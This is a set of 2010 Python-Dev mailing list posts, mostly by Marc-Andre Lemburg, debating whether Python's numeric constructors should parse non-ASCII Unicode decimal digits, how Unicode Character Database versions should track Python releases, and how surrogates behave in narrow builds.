Martin v. Löwis wrote: [...] For direct entry by an interactive user, yes. Why are some people in this discussion thinking only of direct entry by an interactive user? Ultimately, somebody will have entered the data. I don't think you really believe that all data processed by a computer was eventually manually entered by a someone :-) I already gave you a couple of examples of how such data can end up being input for Python number constructors. If you are still curious, please see the Wikipedia pages I linked to, or have a look at these keyboards: http://en.wikipedia.org/wiki/File:KB_Arabic_MAC.svg http://en.wikipedia.org/wiki/File:Keyboard_Layout_Sanskrit.png http://en.wikipedia.org/wiki/File:800px-KB_Thai_Kedmanee.png http://en.wikipedia.org/wiki/File:Tibetan_Keyboard.png http://en.wikipedia.org/wiki/File:KBD-DZ-noshift-2009.png (all referenced on http://en.wikipedia.org/wiki/Keyboard_layout) and then compare these to: http://www.unicode.org/Public/5.2.0/ucd/extracted/DerivedNumericType.txt Arabic numerals are being used a lot nowadays in Asian countries, but that doesn't mean that the native script versions are not being used anymore. Furthermore, data can well originate from texts that were written hundreds or even thousands of years ago, so there is plenty of material available for processing. Even if not entered directly, there are plenty of ways to convert Arabic numerals (or other numeral systems) to the above forms, e.g. in MS Office for Thai: http://office.microsoft.com/en-us/excel-help/convert-arabic-numbers-to-thai-text-format-HP003074364.aspx Anyway, as mentioned before: all this is really besides the point: If we want to support Unicode in Python, we have to also support conversion of numerals declared in Unicode into a form that can be processed by Python. Regardless of where such data originates. 
If we were not to follow this approach, we could just as well decide not to support reading Egyptian Hieroglyphs based on the argument that there's no keyboard to enter them... http://www.unicode.org/charts/PDF/U13000.pdf :-) (from http://www.unicode.org/charts/) Input from an existing text file, as I said earlier. Which *specific* existing text file? Have you actually *seen* such a text file? Have you tried Google ? http://www.google.com/search?q=١٢٣ http://www.google.com/search?q=٣+site%3Agov.lb Some examples: http://www.bdl.gov.lb/circ/intpdf/int123.pdf http://www.cdr.gov.lb/study/sdatl/Arabic/Chapter3.PDF http://www.batroun.gov.lb/PDF/Waredat2006.pdf (these all use http://en.wikipedia.org/wiki/Eastern_Arabic_numerals) Direct entry at the console is a red herring. And we don't need powerhouses because power comes out of the socket. Martin, the argument simply doesn't fit well with the discussion about Python and Unicode. We introduced Unicode in Python not because there was a need for each and every code point in Unicode, but because we wanted to adopt a standard which doesn't prefer any one way of writing things over another. -- Marc-Andre Lemburg eGenix.com (#1, Dec 02 2010)
Re: [Python-Dev] Python and the Unicode Character Database
Eric Smith wrote: The current behavior should go nowhere; it is not useful. Something very similar to the current behavior (but done correctly) should go into the locale module. I agree with everything Martin says here. I think the basic premise is: you won't find strings in the wild that use non-ASCII digits but do use the ASCII dot as a decimal point. And that's what float() is looking for. (And that doesn't even begin to address what it expects for an exponent 'e'.) http://en.wikipedia.org/wiki/Decimal_mark In China, comma and space are used to mark digit groups because dot is used as decimal mark. Note that float() can also parse integers, it just returns them as floats :-) -- Marc-Andre Lemburg eGenix.com (#1, Dec 02 2010)
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: On Thu, Dec 2, 2010 at 4:14 PM, M.-A. Lemburg m...@egenix.com wrote: .. Have you tried Google ? I tried Google and I could not find any plain text or HTML file that would use Arabic-Indic numerals. What was interesting, though, was that a search for quran unicode (without quotes) brought me to http://www.sacred-texts.com which says that they've been using Unicode since 2002 in their archives. Interestingly enough, their version of Qur'an uses ordinary digits for ayah numbers. See, for example http://www.sacred-texts.com/isl/uq/050.htm. I will change my mind on this issue when you present a machine-readable file with Arabic-Indic numerals and a program capable of reading it and show that this program uses the same number parsing algorithm as Python's int() or float(). Have you had a look at the examples I posted ? They include texts and tables with numbers written using east asian arabic numerals. Here's an example of a famous Chinese text using Chinese numerals: http://ctext.org/nine-chapters Unfortunately, the Chinese numerals are not listed in the Category Nd, so Python won't be able to parse them. This has various reasons, it seems, one of them being that the numeral code points were not defined as a range of code points. I'm sure you can find other books on mathematics in Sanskrit or Arabic scripts as well. But this whole branch of the discussion is not going to go anywhere. The point is that we support all of Unicode in Python, not just a fragment, and therefore the numeric constructors support all of Unicode. Using them, it's very easy to support numbers in all kinds of variants, whether bound to a locale or not. Adding more locale aware numeric parsers and formatters to the locale module, based on these APIs is certainly a good idea, but orthogonal to the ongoing discussion, IMO.
-- Marc-Andre Lemburg eGenix.com (#1, Dec 02 2010)
Re: [Python-Dev] Python and the Unicode Character Database
Terry Reedy wrote: On 11/29/2010 10:19 AM, M.-A. Lemburg wrote: Nick Coghlan wrote: On Mon, Nov 29, 2010 at 9:02 PM, M.-A. Lemburgm...@egenix.com wrote: If we would go down that road, we would also have to disable other Unicode features based on locale, e.g. whether to apply non-ASCII case mappings, what to consider whitespace, etc. We don't do that for a good reason: Unicode is supposed to be universal and not limited to a single locale. Because parsing numbers is about more than just the characters used for the individual digits. There are additional semantics associated with digit ordering (for any number) and decimal separators and exponential notation (for floating point numbers) and those vary by locale. We deliberately chose to make the builtin numeric parsers unaware of all of those things, and assuming that we can simply parse other digits as if they were their ASCII equivalents and otherwise assume a C locale seems questionable. Sure, and those additional semantics are locale dependent, even between ASCII-only locales. However, that does not apply to the basic building blocks, the decimal digits themselves. If the existing semantics can be adequately defined, documented and defended, then retaining them would be fine. However, the language reference needs to define the behaviour properly so that other implementations know what they need to support and what can be chalked up as being just an implementation accident of CPython. (As a point in the plus column, both decimal.Decimal and fractions.Fraction were able to handle the '١٢٣٤.٥٦' example in a manner consistent with the int and float handling) The support is built into the C API, so there's not really much surprise there. Regarding documentation, we'd just have to add that numbers may be made up of an Unicode code point in the category Nd. 
See http://www.unicode.org/versions/Unicode5.2.0/ch04.pdf, section 4.6 for details: Decimal digits form a large subcategory of numbers consisting of those digits that can be used to form decimal-radix numbers. They include script-specific digits, but exclude characters such as Roman numerals and Greek acrophonic numerals. (Note that 1, 5 = 15 = fifteen, but I, V = IV = four.) Decimal digits also exclude the compatibility subscript or superscript digits to prevent simplistic parsers from misinterpreting their values in context. int(), float() and long() (in Python2) are such simplistic parsers. Since you are the knowledgeable advocate of the current behavior, perhaps you could open an issue and propose a doc patch, even if not .rst formatted. Good suggestion. I tried to collect as much context as possible: http://bugs.python.org/issue10610 I'll leave the rst-magic to someone else, but will certainly help if you have more questions about the details. -- Marc-Andre Lemburg eGenix.com (#1, Dec 02 2010)
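The distinction drawn in section 4.6 between decimal digits (category Nd) and other numeric characters can be observed from Python 3 with the unicodedata module. The sketch below is only an illustration; `is_decimal_digit` and `try_int` are hypothetical helper names, and the sample characters are my own choice.

```python
import unicodedata


def is_decimal_digit(ch):
    """True if ch is in Unicode general category Nd (decimal digit)."""
    return unicodedata.category(ch) == "Nd"


def try_int(text):
    """Return int(text), or None if int() rejects the string."""
    try:
        return int(text)
    except ValueError:
        return None


samples = {
    "ASCII five": "5",
    "Thai five": "\u0e55",
    "superscript two": "\u00b2",     # compatibility digit, category No
    "Roman numeral five": "\u2164",  # letter number, category Nl
}

for name, ch in samples.items():
    print(name, unicodedata.category(ch), is_decimal_digit(ch), try_int(ch))
```

Only the Nd characters are accepted by int(); the superscript and the Roman numeral are rejected, which matches the exclusions the Unicode text describes.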
Re: [Python-Dev] Python and the Unicode Character Database
Eric Smith wrote: On 12/2/2010 5:43 PM, M.-A. Lemburg wrote: Eric Smith wrote: The current behavior should go nowhere; it is not useful. Something very similar to the current behavior (but done correctly) should go into the locale module. I agree with everything Martin says here. I think the basic premise is: you won't find strings in the wild that use non-ASCII digits but do use the ASCII dot as a decimal point. And that's what float() is looking for. (And that doesn't even begin to address what it expects for an exponent 'e'.) http://en.wikipedia.org/wiki/Decimal_mark In China, comma and space are used to mark digit groups because dot is used as decimal mark. Is that an ASCII dot? That page doesn't say. Yes, but to be fair: I think that the page actually refers to the use of the Arabic numeral format in China, rather than with their own script symbols. Note that float() can also parse integers, it just returns them as floats :-) :) -- Marc-Andre Lemburg eGenix.com (#1, Dec 02 2010)
Re: [Python-Dev] Python and the Unicode Character Database
Terry Reedy wrote: On 11/30/2010 10:05 AM, Alexander Belopolsky wrote: My general answers to the questions you have raised are as follows:

1. Each new feature release should use the latest version of the UCD as of the first beta release (or perhaps a week or so before). New chars are new features and the beta period can be used to (hopefully) iron out any bugs introduced by a new UCD version.

The UCD is versioned just like Python is, so if the Unicode Consortium decides to ship a 5.2.1 version of the UCD, we can add that to Python 2.7.x, since Python 2.7 started out with 5.2.0.

2. The language specification should not be UCD version specific. Martin pointed out that the definition of identifiers was intentionally written to not be, by referring to 'current version' or some such. On the other hand, the UCD version used should be programmatically discoverable, perhaps as an attribute of sys or str.

It already is and has been for a while, e.g. Python 2.5:

    >>> import unicodedata
    >>> unicodedata.unidata_version
    '4.1.0'

3. The UCD should not change in bugfix releases. New chars are new features. Adding them in bugfix releases will introduce gratuitous incompatibilities between releases. People who want the latest Unicode should either upgrade to the latest Python version or patch an older version (but not expect core support for any problems that creates).

See above. Patch level revisions of the UCD are fine for patch level releases of Python, since those patch level revisions of the UCD fix bugs just like we do in Python. Note that each new UCD major.minor version is a new standard on its own, so it's perfectly ok to stick with one such standard version per Python version.

-- Marc-Andre Lemburg eGenix.com (#1, Dec 01 2010)
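The version policy described above (patch-level UCD updates are fine within one Python release series, a new major.minor is not) can be expressed as a small check. This is a sketch only: `unicodedata.unidata_version` is the real attribute mentioned in the message, while `same_ucd_standard` is a hypothetical helper introduced here for illustration.

```python
import sys
import unicodedata

# UCD version this interpreter was built with, e.g. '5.2.0' for Python 2.7.
ucd_version = unicodedata.unidata_version

print("Python", sys.version_info[:3], "ships UCD", ucd_version)


def same_ucd_standard(version_a, version_b):
    """Hypothetical helper: True if two UCD versions share major.minor."""
    return version_a.split(".")[:2] == version_b.split(".")[:2]


# A 5.2.1 update would count as a bug fix of 5.2.0; 6.0.0 is a new standard.
print(same_ucd_standard("5.2.0", "5.2.1"))
print(same_ucd_standard("5.2.0", "6.0.0"))
```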
Re: [Python-Dev] Python and the Unicode Character Database
Martin v. Löwis wrote: On 30.11.2010 21:24, Ben Finney wrote: haiyang kang corn...@gmail.com writes: I think it is a little ugly to have code like this: num = float('一.一'), expected result is: num = 1.1 That's a straw man, though. The string need not be a literal in the program; it can be input to the program. num = float(input_from_the_external_world) Does that change your assessment of whether non-ASCII digits are used? I think the OP (haiyang kang) already indicated that he finds it quite unlikely that anybody would possibly want to enter that. You would need a number of key strokes to enter each individual ideograph, plus you have to press the keys for keyboard layout switching to enter the Latin decimal separator (which you normally wouldn't use along with the Han numerals).

That's a somewhat limited view, IMHO. Numbers are not always entered using a computer keyboard, you have tools like cash registers, special numeric keypads, scanners, OCR, etc. for external entry, and you also have other programs producing such output, e.g. MS Office if configured that way. The argument with the decimal point doesn't work well either, since it's obvious that float() and int() do not support localized input. E.g. in Germany we write 3,141 instead of 3.141:

    >>> float('3,141')
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    ValueError: invalid literal for float(): 3,141

No surprise there. The localization of the input data, e.g. removal of thousands separators and conversion of decimal marks to the dot, has to be done by the application, just like you have to now for German floating point number literals. The locale module already has locale.atof() and locale.atoi() for just this purpose.
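The division of labour described here, where the application normalizes separators and float() handles the digits, might look like the following Python 3 sketch. `parse_localized_float` is a hypothetical helper with hard-coded German-style defaults; it is not how locale.atof() is implemented, and it avoids locale.setlocale() only so that the example runs without a German locale installed.

```python
def parse_localized_float(text, decimal_mark=",", group_mark="."):
    """Hypothetical helper: normalize separators, then defer to float()."""
    normalized = text.replace(group_mark, "").replace(decimal_mark, ".")
    return float(normalized)


# float() itself rejects the German decimal comma.
try:
    float("3,141")
    comma_rejected = False
except ValueError:
    comma_rejected = True

print(comma_rejected)
print(parse_localized_float("3,141"))
print(parse_localized_float("1.234.567,89"))

# The digits may come from another script; only the separators are localized.
print(parse_localized_float("\u0663,\u0661\u0664\u0661"))
```

In an application with the right locale configured, locale.atof() would take the place of the helper.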
FYI, here's a list of decimal digits supported by Python 2.7: http://www.unicode.org/Public/5.2.0/ucd/extracted/DerivedNumericType.txt:

0030..0039; Decimal # Nd [10] DIGIT ZERO..DIGIT NINE
0660..0669; Decimal # Nd [10] ARABIC-INDIC DIGIT ZERO..ARABIC-INDIC DIGIT NINE
06F0..06F9; Decimal # Nd [10] EXTENDED ARABIC-INDIC DIGIT ZERO..EXTENDED ARABIC-INDIC DIGIT NINE
07C0..07C9; Decimal # Nd [10] NKO DIGIT ZERO..NKO DIGIT NINE
0966..096F; Decimal # Nd [10] DEVANAGARI DIGIT ZERO..DEVANAGARI DIGIT NINE
09E6..09EF; Decimal # Nd [10] BENGALI DIGIT ZERO..BENGALI DIGIT NINE
0A66..0A6F; Decimal # Nd [10] GURMUKHI DIGIT ZERO..GURMUKHI DIGIT NINE
0AE6..0AEF; Decimal # Nd [10] GUJARATI DIGIT ZERO..GUJARATI DIGIT NINE
0B66..0B6F; Decimal # Nd [10] ORIYA DIGIT ZERO..ORIYA DIGIT NINE
0BE6..0BEF; Decimal # Nd [10] TAMIL DIGIT ZERO..TAMIL DIGIT NINE
0C66..0C6F; Decimal # Nd [10] TELUGU DIGIT ZERO..TELUGU DIGIT NINE
0CE6..0CEF; Decimal # Nd [10] KANNADA DIGIT ZERO..KANNADA DIGIT NINE
0D66..0D6F; Decimal # Nd [10] MALAYALAM DIGIT ZERO..MALAYALAM DIGIT NINE
0E50..0E59; Decimal # Nd [10] THAI DIGIT ZERO..THAI DIGIT NINE
0ED0..0ED9; Decimal # Nd [10] LAO DIGIT ZERO..LAO DIGIT NINE
0F20..0F29; Decimal # Nd [10] TIBETAN DIGIT ZERO..TIBETAN DIGIT NINE
1040..1049; Decimal # Nd [10] MYANMAR DIGIT ZERO..MYANMAR DIGIT NINE
1090..1099; Decimal # Nd [10] MYANMAR SHAN DIGIT ZERO..MYANMAR SHAN DIGIT NINE
17E0..17E9; Decimal # Nd [10] KHMER DIGIT ZERO..KHMER DIGIT NINE
1810..1819; Decimal # Nd [10] MONGOLIAN DIGIT ZERO..MONGOLIAN DIGIT NINE
1946..194F; Decimal # Nd [10] LIMBU DIGIT ZERO..LIMBU DIGIT NINE
19D0..19DA; Decimal # Nd [11] NEW TAI LUE DIGIT ZERO..NEW TAI LUE THAM DIGIT ONE
1A80..1A89; Decimal # Nd [10] TAI THAM HORA DIGIT ZERO..TAI THAM HORA DIGIT NINE
1A90..1A99; Decimal # Nd [10] TAI THAM THAM DIGIT ZERO..TAI THAM THAM DIGIT NINE
1B50..1B59; Decimal # Nd [10] BALINESE DIGIT ZERO..BALINESE DIGIT NINE
1BB0..1BB9; Decimal # Nd [10] SUNDANESE DIGIT ZERO..SUNDANESE DIGIT NINE
1C40..1C49; Decimal # Nd [10] LEPCHA DIGIT ZERO..LEPCHA DIGIT NINE
1C50..1C59; Decimal # Nd [10] OL CHIKI DIGIT ZERO..OL CHIKI DIGIT NINE
A620..A629; Decimal # Nd [10] VAI DIGIT ZERO..VAI DIGIT NINE
A8D0..A8D9; Decimal # Nd [10] SAURASHTRA DIGIT ZERO..SAURASHTRA DIGIT NINE
A900..A909; Decimal # Nd [10] KAYAH LI DIGIT ZERO..KAYAH LI DIGIT NINE
A9D0..A9D9; Decimal # Nd [10] JAVANESE DIGIT ZERO..JAVANESE DIGIT NINE
AA50..AA59; Decimal # Nd [10] CHAM DIGIT ZERO..CHAM DIGIT NINE
ABF0..ABF9; Decimal # Nd [10] MEETEI MAYEK DIGIT ZERO..MEETEI MAYEK DIGIT NINE
FF10..FF19; Decimal # Nd [10] FULLWIDTH DIGIT ZERO..FULLWIDTH DIGIT NINE
104A0..104A9; Decimal # Nd [10] OSMANYA DIGIT ZERO..OSMANYA DIGIT NINE
1D7CE..1D7FF; Decimal # Nd [50] MATHEMATICAL BOLD DIGIT ZERO..MATHEMATICAL MONOSPACE DIGIT NINE

The Chinese and Japanese ideographs are not supported because of the way they are defined in the Unihan database. I'm currently investigating how we could support them as well.

-- Marc-Andre Lemburg eGenix.com
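The difference between the Nd ranges listed above and the Han numerals can be seen directly in Python 3. The sketch assumes a CPython build whose unicodedata includes the Unihan numeric values, which I believe is the case for current releases; `try_int` is a hypothetical helper.

```python
import unicodedata

han_one = "\u4e00"        # CJK ideograph meaning "one"
fullwidth_one = "\uff11"  # FULLWIDTH DIGIT ONE, inside FF10..FF19


def try_int(text):
    """Return int(text), or None if int() rejects the string."""
    try:
        return int(text)
    except ValueError:
        return None


for ch in (han_one, fullwidth_one):
    print(
        unicodedata.name(ch),
        unicodedata.category(ch),  # 'Lo' for the ideograph, 'Nd' for the digit
        unicodedata.numeric(ch),   # both carry the numeric value 1.0
        try_int(ch),               # only the Nd character is parsed
    )
```

The ideograph has a numeric value but is a letter (Lo) with no decimal-digit property, so the numeric constructors do not treat it as a digit.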
Re: [Python-Dev] Python and the Unicode Character Database
Terry Reedy wrote: On 11/30/2010 3:23 AM, Stephen J. Turnbull wrote: I see no reason not to make a similar promise for numeric literals. I see no good reason to allow compatibility full-width Japanese ASCII numerals or Arabic cursive numerals in for i in range(...) for example. I do not think that anyone, at least not me, has argued for anything other than 0-9 digits (or 0-f for hex) in literals in program code. The only issue is whether non-programmer *users* should be able to use their native digits in applications in response to input prompts. Me neither. This is solely about Python being able to parse numeric input in the float(), int() and complex() constructors. -- Marc-Andre Lemburg eGenix.com (#1, Dec 01 2010)
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: On Sun, Nov 28, 2010 at 5:42 PM, M.-A. Lemburg m...@egenix.com wrote: .. I don't see why the language spec should limit the wealth of number formats supported by float(). The Language Spec (whatever it is) should not, but hopefully the Library Reference should. If you follow http://docs.python.org/dev/py3k/library/functions.html#float link and the references therein, you'll end up with ... the language spec again :-) digit ::= 0...9 http://docs.python.org/dev/py3k/reference/lexical_analysis.html#grammar-token-digit That's obviously a bug in the documentation, since the Python 2.7 docs don't mention any such relationship to the language spec: http://docs.python.org/library/functions.html#float -- Marc-Andre Lemburg eGenix.com (#1, Nov 29 2010)
Re: [Python-Dev] Python and the Unicode Character Database
Nick Coghlan wrote: On Mon, Nov 29, 2010 at 1:39 PM, Stephen J. Turnbull step...@xemacs.org wrote: I agree that Python should make it easy for the programmer to get numerical values of native numeric strings, but it's not at all clear to me that there is any point to having float() recognize them by default. Indeed, as someone else suggested earlier in the thread, supporting non-ASCII digits sounds more like a job for the locale module than for the builtin types. Deprecating non-ASCII support in the latter, while ensuring it is properly supported in the former sounds like a better way forward than maintaining the status quo (starting in 3.3 though, with the first beta just around the corner, we don't want to be monkeying with this in 3.2) Since when do we only support certain Unicode features in specific locales ? If we would go down that road, we would also have to disable other Unicode features based on locale, e.g. whether to apply non-ASCII case mappings, what to consider whitespace, etc. We don't do that for a good reason: Unicode is supposed to be universal and not limited to a single locale. -- Marc-Andre Lemburg eGenix.com (#1, Nov 29 2010)
Re: [Python-Dev] Python and the Unicode Character Database
Nick Coghlan wrote: On Mon, Nov 29, 2010 at 9:02 PM, M.-A. Lemburg m...@egenix.com wrote: If we would go down that road, we would also have to disable other Unicode features based on locale, e.g. whether to apply non-ASCII case mappings, what to consider whitespace, etc. We don't do that for a good reason: Unicode is supposed to be universal and not limited to a single locale. Because parsing numbers is about more than just the characters used for the individual digits. There are additional semantics associated with digit ordering (for any number) and decimal separators and exponential notation (for floating point numbers) and those vary by locale. We deliberately chose to make the builtin numeric parsers unaware of all of those things, and assuming that we can simply parse other digits as if they were their ASCII equivalents and otherwise assume a C locale seems questionable. Sure, and those additional semantics are locale dependent, even between ASCII-only locales. However, that does not apply to the basic building blocks, the decimal digits themselves. If the existing semantics can be adequately defined, documented and defended, then retaining them would be fine. However, the language reference needs to define the behaviour properly so that other implementations know what they need to support and what can be chalked up as being just an implementation accident of CPython. (As a point in the plus column, both decimal.Decimal and fractions.Fraction were able to handle the '١٢٣٤.٥٦' example in a manner consistent with the int and float handling) The support is built into the C API, so there's not really much surprise there. Regarding documentation, we'd just have to add that numbers may be made up of Unicode code points in the category Nd. See http://www.unicode.org/versions/Unicode5.2.0/ch04.pdf, section 4.6 for details: "Decimal digits form a large subcategory of numbers consisting of those digits that can be used to form decimal-radix numbers.
They include script-specific digits, but exclude characters such as Roman numerals and Greek acrophonic numerals. (Note that 1, 5 = 15 = fifteen, but I, V = IV = four.) Decimal digits also exclude the compatibility subscript or superscript digits to prevent simplistic parsers from misinterpreting their values in context." int(), float() and long() (in Python2) are such simplistic parsers. -- Marc-Andre Lemburg
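To make the Nd rule concrete, here is a minimal sketch, assuming a current Python 3 interpreter and its bundled unicodedata module. The helper name is_decimal_digit_string is made up for illustration and is not part of any API; the sample characters are the Arabic-Indic digits from the thread plus a superscript and a Roman numeral, which the quoted passage says are excluded.

```python
import unicodedata


def is_decimal_digit_string(text):
    """Hypothetical helper: True if every character is in category Nd."""
    return bool(text) and all(unicodedata.category(ch) == "Nd" for ch in text)


arabic_indic = "\u0661\u0662\u0663\u0664"  # ARABIC-INDIC DIGITS ONE..FOUR
superscript_two = "\u00b2"                 # category No, not Nd
roman_four = "\u2163"                      # ROMAN NUMERAL FOUR, category Nl

print(is_decimal_digit_string(arabic_indic))  # all four characters are Nd
print(int(arabic_indic))                      # parsed like the ASCII digits

# Characters outside Nd are rejected by the numeric constructors.
for rejected in (superscript_two, roman_four):
    try:
        int(rejected)
    except ValueError:
        print(repr(rejected), unicodedata.category(rejected), "rejected by int()")
```

The point of the sketch is only that the builtin parsers key on the decimal digit property, not on what a character looks like.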
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: On Mon, Nov 29, 2010 at 2:22 AM, Martin v. Löwis mar...@v.loewis.de wrote: The former ensures that literals in code are always readable; the latter allows users to enter numbers in their own number system. How could that be a bad thing? It's YAGNI, feature bloat. It gives the illusion of supporting something that actually isn't supported very well (namely, parsing local number strings). I claim that there is no meaningful application of this feature. This is not about parsing local number strings, it's about parsing number strings represented using different scripts - besides en-US is a locale as well, ye know :-) Speaking of YAGNI, does anyone want to defend complex('١٢٣٤.٥٦j') 1234.56j ? Yes. The same arguments apply. Just because ASCII-proponents may have a hard time reading such literals, doesn't mean that script users have the same trouble. Especially given that we reject complex('1234.56i'): http://bugs.python.org/issue10562 We've had that discussion long before we had Unicode in Python. The main reason was that 'i' looked too similar to 1 in a number of fonts, which is why it was rejected for Python source code. However, I don't see any reason why we shouldn't accept both i and j for complex(), since the input to that constructor doesn't have to originate in Python source code. -- Marc-Andre Lemburg
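As an illustration of the suggestion to accept both i and j outside of source code, here is a minimal sketch of a wrapper around the builtin complex(). The name parse_complex is hypothetical; the builtin itself only accepts j or J, and this wrapper simply rewrites a trailing i before delegating.

```python
def parse_complex(text):
    """Hypothetical wrapper: accept a trailing 'i'/'I' as the imaginary unit."""
    stripped = text.strip()
    # complex() only understands 'j'/'J', so translate the final letter.
    if stripped[-1:] in ("i", "I"):
        stripped = stripped[:-1] + "j"
    return complex(stripped)


print(parse_complex("1234.56i"))
print(parse_complex("1+2i"))
print(parse_complex("3j"))
```

Only the last character is rewritten, so ordinary input such as "3j" or "2.5" passes through unchanged.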
Re: [Python-Dev] Python and the Unicode Character Database
Martin v. Löwis wrote: float('١٢٣٤.٥٦') 1234.56 I think it's a bug that this works. The definition of the float builtin says: Convert a string or a number to floating point. If the argument is a string, it must contain a possibly signed decimal or floating point number, possibly embedded in whitespace. The argument may also be '[+|-]nan' or '[+|-]inf'. Now, one may wonder what precisely a possibly signed floating point number is, but most likely, this refers to
    floatnumber   ::= pointfloat | exponentfloat
    pointfloat    ::= [intpart] fraction | intpart "."
    exponentfloat ::= (intpart | pointfloat) exponent
    intpart       ::= digit+
    fraction      ::= "." digit+
    exponent      ::= ("e" | "E") ["+" | "-"] digit+
    digit         ::= "0"..."9"
I don't see why the language spec should limit the wealth of number formats supported by float(). It is not uncommon for Asians and other non-Latin script users to use their own native script symbols for numbers. Just because these digits may look strange to someone doesn't mean that they are meaningless or should be discarded. Please also remember that Python3 now allows Unicode names for identifiers for much the same reasons. Note that the support in float() (and the other numeric constructors) to work with Unicode code points was explicitly added when Unicode support was added to Python and has been available since Python 1.6. It is not a bug by any definition of bug, even though the feature may bug someone occasionally to go read up a bit on what else the world has to offer other than Arabic numerals :-) http://en.wikipedia.org/wiki/Numeral_system -- Marc-Andre Lemburg
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: Two recently reported issues brought into light the fact that Python language definition is closely tied to character properties maintained by the Unicode Consortium. [1,2] For example, when Python switches to Unicode 6.0.0 (planned for the upcoming 3.2 release), we will gain two additional characters that Python can use in identifiers. [3] With Python 3.1: exec('\u0CF1 = 1') Traceback (most recent call last): File stdin, line 1, in module File string, line 1 ೱ = 1 ^ SyntaxError: invalid character in identifier but with Python 3.2a4: exec('\u0CF1 = 1') eval('\u0CF1') 1 Such changes are not new, but I agree that they should probably be highlighted in the What's new in Python x.x. Of course, the likelihood is low that this change will affect any user, but the change in str.isspace() reported in [1] is likely to cause some trouble: Python 2.6.5: u'A\u200bB'.split() [u'A', u'B'] Python 2.7: u'A\u200bB'.split() [u'A\u200bB'] That's a classical bug fix. While we have little choice but to follow UCD in defining str.isidentifier(), I think Python can promise users more stability in what it treats as space or as a digit in its builtins. Why should we divert from the work done by the Unicode Consortium ? After all, most of their changes are in fact bug fixes as well. For example, I don't think that supporting float('١٢٣٤.٥٦') 1234.56 is more important than to assure users that once their program accepted some text as a number, they can assume that the text is ASCII. Sorry, but I don't agree. If ASCII numerals are an important aspect of an application, the application should make sure that only those numerals are used (e.g. by using a regular expression for checking). In a Unicode world, not accepting non-Arabic numerals would be a limitation, not a feature. Besides Python has had this support since Python 1.6. 
[1] http://bugs.python.org/issue10567 [2] http://bugs.python.org/issue10557 [3] http://www.unicode.org/versions/Unicode6.0.0/#Database_Changes -- Marc-Andre Lemburg
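For applications that do need ASCII-only numerals, the regular-expression check mentioned above could look roughly like the following sketch. It assumes Python 3; the names ASCII_DECIMAL and parse_ascii_float are invented for this example, and the pattern covers only plain decimal notation (no exponents, no nan/inf).

```python
import re

# Explicit [0-9] rather than \d, because \d also matches non-ASCII
# decimal digits when the pattern is a str.
ASCII_DECIMAL = re.compile(r"[+-]?[0-9]+(\.[0-9]+)?")


def parse_ascii_float(text):
    """Hypothetical helper: parse a float, rejecting non-ASCII digits."""
    if ASCII_DECIMAL.fullmatch(text) is None:
        raise ValueError("not an ASCII decimal number: %r" % (text,))
    return float(text)


print(parse_ascii_float("1234.56"))
print(float("\u0661\u0662\u0663\u0664.\u0665\u0666"))  # the builtin accepts these

try:
    parse_ascii_float("\u0661\u0662\u0663\u0664.\u0665\u0666")
except ValueError as exc:
    print("rejected:", exc)

# The str.split() behaviour from the thread: U+200B is not whitespace.
print("A\u200bB".split())
```

The restriction lives in the application, while float() keeps its script-neutral behaviour.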
Re: [Python-Dev] len(chr(i)) = 2?
Terry Reedy wrote: On 11/24/2010 3:06 PM, Alexander Belopolsky wrote: Any non-trivial text processing is likely to be broken in presence of surrogates. Producing them on input is just trading known issue for an unknown one. Processing surrogate pairs in python code is hard. Software that has to support non-BMP characters will most likely be written for a wide build and contain subtle bugs when run under a narrow build. Note that my latest proposal does not abolish surrogates outright. Users who want them can still use something like surrogateescape error handler for non-BMP characters. It seems to me that what you are asking for is an alternate, optional, utf-8-bmp codec that would raise an error, in either direction, for non-bmp chars. Then, as you suggest, if one is not prepared for surrogates, they are not allowed. That would be a possibility as well... but I doubt that many users are going to bother, since slicing surrogates is just as bad as slicing combining code points and the latter are much more common in real life and they do happen to mostly live in the BMP. -- Marc-Andre Lemburg
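The "utf-8-bmp" idea can be approximated without registering a real codec. The sketch below assumes Python 3; the function names are hypothetical, no such codec exists in the standard library, and the check is done on code points after an ordinary UTF-8 decode (or before an ordinary encode).

```python
def _require_bmp(text):
    """Raise UnicodeError if text contains a code point above U+FFFF."""
    for index, ch in enumerate(text):
        if ord(ch) > 0xFFFF:
            raise UnicodeError(
                "non-BMP code point U+%06X at index %d" % (ord(ch), index)
            )
    return text


def decode_utf8_bmp(data):
    """Hypothetical BMP-only decoder built on the regular UTF-8 codec."""
    return _require_bmp(data.decode("utf-8"))


def encode_utf8_bmp(text):
    """Hypothetical BMP-only encoder built on the regular UTF-8 codec."""
    return _require_bmp(text).encode("utf-8")


print(decode_utf8_bmp("h\u00e9llo".encode("utf-8")))

try:
    decode_utf8_bmp("\U00010140".encode("utf-8"))
except UnicodeError as exc:
    print("rejected:", exc)
```

As noted in the reply above, this guards against surrogates but does nothing about combining code points, which are the more common way to end up slicing a user-visible character in half.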
Re: [Python-Dev] len(chr(i)) = 2?
Alexander Belopolsky wrote: On Wed, Nov 24, 2010 at 9:17 PM, Stephen J. Turnbull step...@xemacs.org wrote: .. I note that an opinion has been raised on this thread that if we want compressed internal representation for strings, we should use UTF-8. I tend to agree, but UTF-8 has been repeatedly rejected as too hard to implement. What makes UTF-16 easier than UTF-8? Only the fact that you can ignore bugs longer, in my view. That's mostly true. My guess is that we can probably ignore those bugs for as long as it takes someone to write the higher-level libraries that James suggests and MAL has actually proposed and started a PEP for. As far as I can tell, that PEP generated grand total of one comment in nine years. This may or may not be indicative of how far away we are from seeing it implemented. :-) At the time it was too early for people to start thinking about these issues. Actual use of Unicode really only started a few years ago. Since I didn't have a need for such an indexing module myself (and didn't have much time to work on it anyway), I punted on the idea. If someone else wants to pick up the idea, I'd gladly help out with the details. As far as UTF-8 vs. UCS-2/4 debate, I have an idea that may be even more far fetched. Once upon a time, Python Unicode strings supported buffer protocol and would lazily fill an internal buffer with bytes in the default encoding. In 3.x the default encoding has been fixed as UTF-8, buffer protocol support was removed from strings, but the internal buffer caching (now UTF-8) encoded representation remained. Maybe we can now implement defenc logic in reverse. Recall that strings are stored as UCS-2/4 sequences, but once buffer is requested in 2.x Python code or char* is obtained via _PyUnicode_AsStringAndSize() at the C level in 3.x, an internal buffer is filled with UTF-8 bytes and defenc is set to point to that buffer. The original idea was for that buffer to go away once we moved to 